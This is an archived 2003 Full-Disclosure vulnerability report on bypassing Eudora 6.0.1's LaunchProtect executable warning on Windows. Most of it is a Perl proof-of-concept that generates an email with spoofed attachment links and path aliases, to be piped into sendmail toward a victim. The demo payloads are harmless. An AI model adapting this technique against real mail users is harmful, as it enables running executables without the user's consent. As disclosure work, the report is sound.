[Full-Disclosure] Eudora 6.0.1 LaunchProtect

From: Paul Szabo (psz_at_maths.usyd.edu.au)
Date: 11/25/03

  • Next message: bugzilla_at_redhat.com: "[Full-Disclosure] [RHSA-2003:296-01] Updated stunnel packages available"
    To: beckley@qualcomm.com, bugtraq@securityfocus.com, full-disclosure@lists.netsys.com
    Date: Tue, 25 Nov 2003 14:17:52 +1100 (EST)

    Eudora 6.0.1 (on Windows) has LaunchProtect, to warn the user before
    running executable attachments. However this only works in the attach
    folder; using spoofed attachments, executables stored elsewhere may run
    without warning. In some setups, even executables in the attach folder
    may run without warning.

    Harmless demo below.


    Paul Szabo - psz@maths.usyd.edu.au http://www.maths.usyd.edu.au:8000/u/psz/
    School of Mathematics and Statistics University of Sydney 2006 Australia

    #!/usr/bin/perl --
    use MIME::Base64;
    print "From: me\n";
    print "To: you\n";
    print "Subject: Eudora 6.0.1 on Windows spoof, LaunchProtect\n";
    print "\n";
    print "Pipe the output of this script into:   sendmail -i victim\n";
    print "
    Eudora 6.0.1 LaunchProtect handles the X-X.exe dichotomy in the attach
    directory only, and allows spoofed attachments pointing to an executable
    stored elsewhere to run without warning:\n";
    print "Attachment Converted\r: <a href=c:/winnt/system32/calc>go.txt</a>\n";
    print "Attachment Converted\r: c:/winnt/system32/calc\n";
    $X = 'README'; $Y = "$X.bat";
    print "\nThe X - X.exe dichotomy: send a plain $X attachment:\n";
    $z = "rem Funny joke\r\npause\r\n";
    print "begin 600 $X\n", pack('u',$z), "`\nend\n";
    print "\nand (in another message or) after some blurb so is scrolled off in
    another screenful, also send $Y. Clicking on $X does not
    get it any more (but gets $Y, with a LauchProtect warning):\n";
    $z = "rem Big joke\r\nrem Should do something nasty\r\npause\r\n";
    print "begin 600 $Y\n", pack('u',$z), "`\nend\n";
    print "
    Can be exploited if there is more than one way into attach: in my setup
    H: and \\\\rome\\home are the same thing, but Eudora does not know that.\n";
    print "These elicit warnings:\n";
    print "Attachment Converted\r: <a href=h:/eudora/attach/README>readme</a>\n";
    print "Attachment Converted\r: h:/eudora/attach/README\n";
    print "while these do the bad thing without warning:\n";
    print "Attachment Converted\r: <a href=file://rome/home/eudora/attach/README>readme</a>\n";
    print "Attachment Converted\r: //rome/home/eudora/attach/README\n";
    print "Attachment Converted\r: \\\\rome\\home\\eudora\\attach\\README\n";
    print "
    For the default setup, Eudora knows that C:\\Program Files
    and C:\\Progra~1 are the same thing...\n";
    print "Attachment Converted\r: \"c:/program files/qualcomm/eudora/attach/README\"\n";
    print "Attachment Converted\r: \"c:/progra~1/qualcomm/eudora/attach/README\"\n";
    print "\n";
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

  • Next message: bugzilla_at_redhat.com: "[Full-Disclosure] [RHSA-2003:296-01] Updated stunnel packages available"